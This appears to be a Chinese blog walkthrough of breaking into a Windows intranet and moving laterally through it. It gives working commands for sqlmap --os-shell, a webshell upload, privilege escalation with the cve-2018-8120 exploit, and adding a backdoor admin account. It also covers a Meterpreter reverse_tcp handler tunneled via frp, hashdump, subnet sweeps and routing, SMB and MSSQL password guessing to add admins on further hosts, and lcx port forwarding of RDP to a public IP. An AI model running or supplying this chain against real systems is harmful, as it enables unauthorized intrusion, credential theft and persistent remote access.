內(nèi)網(wǎng)滲透之橫向滲透

前言

在一次測(cè)試中發(fā)現(xiàn)某系統(tǒng)存在SQL注入漏洞。且IIS可暴露絕對(duì)路徑。


image.png

使用--os-shell命令,填寫絕對(duì)路徑可執(zhí)行系統(tǒng)命令。


image.png

提權(quán)

sqlmap在執(zhí)行--os-shellI命令時(shí)向服務(wù)器寫入了上傳文件的腳本。
通過文件上傳可直接上傳大馬。


image.png

簡(jiǎn)單執(zhí)行幾條系統(tǒng)命令查看該服務(wù)器基本情況。


image.png

image.png

權(quán)限不夠,上傳cve-2018-8120.exe進(jìn)行提權(quán)。 
cve-2018-8120.exe  "whoami"
image.png
cve-2018-8120.exe  "net  user   admintest  1234qwer..   /add"
cve-2018-8120.exe  "net  localgroup  administrators  admintest   /add"

進(jìn)而添加用戶到管理員組。
由于該服務(wù)器在內(nèi)網(wǎng)。
選擇自己上傳msf馬(由veil生成),由frp穿透到內(nèi)網(wǎng)。
詳情參考:getshell的進(jìn)一步利用

use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
exploit -j

進(jìn)而端口轉(zhuǎn)發(fā)登錄該服務(wù)器。

portfwd add -l 3389  -r 10.0.15.20  -p  3389

image.png

這里使用公網(wǎng)進(jìn)行訪問,
注:依然需要在frpc上進(jìn)行配置。
image.png

為了在內(nèi)網(wǎng)獲取更多服務(wù)器,需要獲取管理員administrator的密碼。
在登錄成功的前提下,以管理員身份再次運(yùn)行msf馬,可順利提權(quán)至system。

getuid             當(dāng)前權(quán)限                                
getsystem          通過各種攻擊提升到system權(quán)限
run post/windows/gather/hashdump   獲取系統(tǒng)密碼hash
run post/windows/gather/checkvm   檢查是否是虛擬機(jī)
image.png

嘗試md5解密一下。。nice?。?!


image.png

使用administrator來登錄。


image.png

果然,信息有很多。
比如mysql數(shù)據(jù)庫(kù)。


image.png

內(nèi)網(wǎng)滲透

首先看一下該局域網(wǎng)存活主機(jī)

for /l  %i  in (1,1,255) do @  ping  10.0.15.%i  -w  1  -n  1 |  find  /i  "ttl="
image.png

meterpreter添加路由。

run  get_local_subnets                 獲取當(dāng)前網(wǎng)段
run  autoroute -s 10.0.15.0/24         添加路由
image.png

使用metasploit模塊查看一下該局域網(wǎng)開啟3389的服務(wù)器。

use  auxiliary/scanner/rdp/rdp_scanner 
set  rhosts 10.0.15.10-33
run
image.png

掃描smb登錄

use     auxiliary/scanner/smb/smb_login
set     RHOSTS    10.0.15.10-33
set     SMBUser   administrator
set     SMBPass   123456a?
run
image.png

image.png

這個(gè)結(jié)果令人欣喜。。。
登錄幾臺(tái)試試。


image.png

image.png

繼續(xù)。。上傳hsscan工具掃描一下弱口令。


image.png

使用metasploit的mssql模塊來添加管理員。

use auxiliary/admin/mssql/mssql_exec
set RHOST     10.0.15.12
set USERNAME  sa
set PASSWORD  soft
set CMD       net user admintest   1234qwer.. /add
run
image.png

ok?。?!


image.png

go,go,go。重復(fù)之前的操作。上傳msf馬并以管理員身份運(yùn)行。
提權(quán)后獲取管理員密碼。


image.png

MD5解密一下。。


image.png

以administrator登錄


image.png

再次批量掃描smb。又獲取幾臺(tái)服務(wù)器。


image.png

嘗試登錄10.0.15.13試試


image.png

擴(kuò)展

為了更加方便遠(yuǎn)程服務(wù)器,上傳lcx.exe工具進(jìn)行端口轉(zhuǎn)發(fā)。
在公網(wǎng)上使用該命令

./portmap -m 2 -p1 2222 -p2 5555    linux監(jiān)聽端口
image.png

靶機(jī)上使用以下命令。

lcx.exe  -slave  公網(wǎng)IP 2222  10.0.15.20   3389    windows轉(zhuǎn)發(fā)端口
image.png

image.png
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容